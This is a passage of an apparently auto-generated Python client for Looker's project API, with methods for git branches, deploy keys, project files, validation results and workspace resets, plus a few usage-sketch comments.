raise ValueError("Missing the required parameter `project_id` when calling `all_git_branches`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/git_branches', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[GitBranch]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def all_git_connection_tests(self, project_id, **kwargs): # noqa: E501
"""Get All Git Connection Tests # noqa: E501
### Get All Git Connection Tests Returns a list of tests which can be run against a project's git connection # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.all_git_connection_tests(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:return: list[GitConnectionTest]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.all_git_connection_tests_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.all_git_connection_tests_with_http_info(project_id, **kwargs) # noqa: E501
return data
def all_git_connection_tests_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Get All Git Connection Tests # noqa: E501
### Get All Git Connection Tests Returns a list of tests which can be run against a project's git connection # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.all_git_connection_tests_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:return: list[GitConnectionTest]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method all_git_connection_tests" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `all_git_connection_tests`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/git_connection_tests', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[GitConnectionTest]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def all_project_files(self, project_id, **kwargs): # noqa: E501
"""Get All Project Files # noqa: E501
### Get All Project Files Returns a list of the files in the project # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.all_project_files(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str fields: Requested fields
:return: list[ProjectFile]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.all_project_files_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.all_project_files_with_http_info(project_id, **kwargs) # noqa: E501
return data
def all_project_files_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Get All Project Files # noqa: E501
### Get All Project Files Returns a list of the files in the project # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.all_project_files_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str fields: Requested fields
:return: list[ProjectFile]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'fields'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method all_project_files" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `all_project_files`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/files', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ProjectFile]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def all_projects(self, **kwargs): # noqa: E501
"""Get All Projects # noqa: E501
### Get All Projects Returns all projects visible to the current user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.all_projects(async=True)
>>> result = thread.get()
:param async bool
:param str fields: Requested fields
:return: list[Project]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.all_projects_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.all_projects_with_http_info(**kwargs) # noqa: E501
return data
def all_projects_with_http_info(self, **kwargs): # noqa: E501
"""Get All Projects # noqa: E501
### Get All Projects Returns all projects visible to the current user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.all_projects_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str fields: Requested fields
:return: list[Project]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['fields'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method all_projects" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Project]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
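# A hypothetical usage sketch (the client setup is assumed, not part of the
# generated code):
#
#   api = ProjectApi(authenticated_api_client)
#   projects = api.all_projects(fields='id,name')             # synchronous
#   thread = api.all_projects(fields='id,name', async=True)   # asynchronous
#   projects = thread.get()
#
# Note that the `async` keyword argument only parses on Python < 3.7, where
# `async` was not yet a reserved word; later swagger-codegen releases renamed
# it to `async_req`.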
def create_git_deploy_key(self, project_id, **kwargs): # noqa: E501
"""Create Deploy Key # noqa: E501
### Create Git Deploy Key Create a public/private key pair for authenticating ssh git requests from Looker to a remote git repository for a particular Looker project. Returns the public key of the generated ssh key pair. Copy this public key to your remote git repository's ssh keys configuration so that the remote git service can validate and accept git requests from the Looker server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_git_deploy_key(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_git_deploy_key_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.create_git_deploy_key_with_http_info(project_id, **kwargs) # noqa: E501
return data
def create_git_deploy_key_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Create Deploy Key # noqa: E501
### Create Git Deploy Key Create a public/private key pair for authenticating ssh git requests from Looker to a remote git repository for a particular Looker project. Returns the public key of the generated ssh key pair. Copy this public key to your remote git repository's ssh keys configuration so that the remote git service can validate and accept git requests from the Looker server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_git_deploy_key_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_git_deploy_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `create_git_deploy_key`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/git/deploy_key', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
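# A hypothetical sketch of the deploy-key workflow the docstrings above
# describe (the project id is an assumption):
#
#   public_key = api.create_git_deploy_key('my_project')
#   # Copy `public_key` into the remote git repository's deploy-key settings
#   # so the remote service accepts ssh git requests from this Looker
#   # instance; retrieve it again later with api.git_deploy_key('my_project').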
def create_project(self, **kwargs): # noqa: E501
"""Create Project # noqa: E501
### Create A Project dev mode required. - Call `update_session` to select the 'dev' workspace. `name` is required. `git_remote_url` is not allowed. To configure Git for the newly created project, follow the instructions in `update_project`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_project(async=True)
>>> result = thread.get()
:param async bool
:param Project body: Project
:return: Project
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_project_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.create_project_with_http_info(**kwargs) # noqa: E501
return data
def create_project_with_http_info(self, **kwargs): # noqa: E501
"""Create Project # noqa: E501
### Create A Project dev mode required. - Call `update_session` to select the 'dev' workspace. `name` is required. `git_remote_url` is not allowed. To configure Git for the newly created project, follow the instructions in `update_project`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_project_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param Project body: Project
:return: Project
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_project" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Project', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
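# A hypothetical sketch of creating a project (the Project model import path
# is an assumption based on this package's layout):
#
#   from looker_client_30 import Project
#   new_project = api.create_project(body=Project(name='my_project'))
#
# Per the docstring above, the session must be in the 'dev' workspace (see
# update_session), and git_remote_url may not be set at creation time.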
def git_deploy_key(self, project_id, **kwargs): # noqa: E501
"""Git Deploy Key # noqa: E501
### Git Deploy Key Returns the ssh public key previously created for a project's git repository. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.git_deploy_key(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.git_deploy_key_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.git_deploy_key_with_http_info(project_id, **kwargs) # noqa: E501
return data
def git_deploy_key_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Git Deploy Key # noqa: E501
### Git Deploy Key Returns the ssh public key previously created for a project's git repository. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.git_deploy_key_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method git_deploy_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `git_deploy_key`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/git/deploy_key', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def project(self, project_id, **kwargs): # noqa: E501
"""Get Project # noqa: E501
### Get A Project Returns the project with the given project id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.project(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str fields: Requested fields
:return: Project
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.project_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.project_with_http_info(project_id, **kwargs) # noqa: E501
return data
def project_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Get Project # noqa: E501
### Get A Project Returns the project with the given project id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.project_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str fields: Requested fields
:return: Project
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'fields'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method project" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `project`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Project', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def project_file(self, project_id, file_id, **kwargs): # noqa: E501
"""Get Project File # noqa: E501
### Get Project File Info Returns information about a file in the project # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.project_file(project_id, file_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str file_id: File Id (required)
:param str fields: Requested fields
:return: ProjectFile
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.project_file_with_http_info(project_id, file_id, **kwargs) # noqa: E501
else:
(data) = self.project_file_with_http_info(project_id, file_id, **kwargs) # noqa: E501
return data
def project_file_with_http_info(self, project_id, file_id, **kwargs): # noqa: E501
"""Get Project File # noqa: E501
### Get Project File Info Returns information about a file in the project # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.project_file_with_http_info(project_id, file_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str file_id: File Id (required)
:param str fields: Requested fields
:return: ProjectFile
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'file_id', 'fields'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method project_file" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `project_file`") # noqa: E501
# verify the required parameter 'file_id' is set
if ('file_id' not in params or
params['file_id'] is None):
raise ValueError("Missing the required parameter `file_id` when calling `project_file`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
if 'file_id' in params:
query_params.append(('file_id', params['file_id'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/files/file', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProjectFile', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def project_validation_results(self, project_id, **kwargs): # noqa: E501
"""Cached Project Validation Results # noqa: E501
### Get Cached Project Validation Results Returns the cached results of a previous project validation calculation, if any. Returns http status 204 No Content if no validation results exist. Validating the content of all the files in a project can be computationally intensive for large projects. Use this API to simply fetch the results of the most recent project validation rather than revalidating the entire project from scratch. A value of `\"stale\": true` in the response indicates that the project has changed since the cached validation results were computed. The cached validation results may no longer reflect the current state of the project. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.project_validation_results(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str fields: Requested fields
:return: ProjectValidationCache
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.project_validation_results_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.project_validation_results_with_http_info(project_id, **kwargs) # noqa: E501
return data
def project_validation_results_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Cached Project Validation Results # noqa: E501
### Get Cached Project Validation Results Returns the cached results of a previous project validation calculation, if any. Returns http status 204 No Content if no validation results exist. Validating the content of all the files in a project can be computationally intensive for large projects. Use this API to simply fetch the results of the most recent project validation rather than revalidating the entire project from scratch. A value of `\"stale\": true` in the response indicates that the project has changed since the cached validation results were computed. The cached validation results may no longer reflect the current state of the project. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.project_validation_results_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str fields: Requested fields
:return: ProjectValidationCache
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'fields'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method project_validation_results" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `project_validation_results`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/validate', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProjectValidationCache', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
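# A hedged sketch of the caching pattern described in the docstring above.
# The `stale` attribute is named in the response description; treating an
# empty (204 No Content) response as "no cache" is an assumption:
#
#   cache = api.project_validation_results('my_project')
#   if not cache or cache.stale:
#       validation = api.validate_project('my_project')  # full, expensive revalidation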
def project_workspace(self, project_id, **kwargs): # noqa: E501
"""Get Project Workspace # noqa: E501
### Get Project Workspace Returns information about the state of the project files in the currently selected workspace # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.project_workspace(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str fields: Requested fields
:return: ProjectWorkspace
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.project_workspace_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.project_workspace_with_http_info(project_id, **kwargs) # noqa: E501
return data
def project_workspace_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Get Project Workspace # noqa: E501
### Get Project Workspace Returns information about the state of the project files in the currently selected workspace # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.project_workspace_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str fields: Requested fields
:return: ProjectWorkspace
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'fields'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method project_workspace" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `project_workspace`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/current_workspace', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProjectWorkspace', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def reset_project_to_production(self, project_id, **kwargs): # noqa: E501
"""Reset To Production # noqa: E501
### Reset a project to the revision of the project that is in production. **DANGER** this will delete any changes that have not been pushed to a remote repository. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.reset_project_to_production(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Id of project (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.reset_project_to_production_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.reset_project_to_production_with_http_info(project_id, **kwargs) # noqa: E501
return data
def reset_project_to_production_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Reset To Production # noqa: E501
### Reset a project to the revision of the project that is in production. **DANGER** this will delete any changes that have not been pushed to a remote repository. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.reset_project_to_production_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Id of project (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method reset_project_to_production" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `reset_project_to_production`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/reset_to_production', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def reset_project_to_remote(self, project_id, **kwargs): # noqa: E501
"""Reset To Remote # noqa: E501
### Reset a project development branch to the revision of the project that is on the remote. **DANGER** this will delete any changes that have not been pushed to a remote repository. # noqa: E501
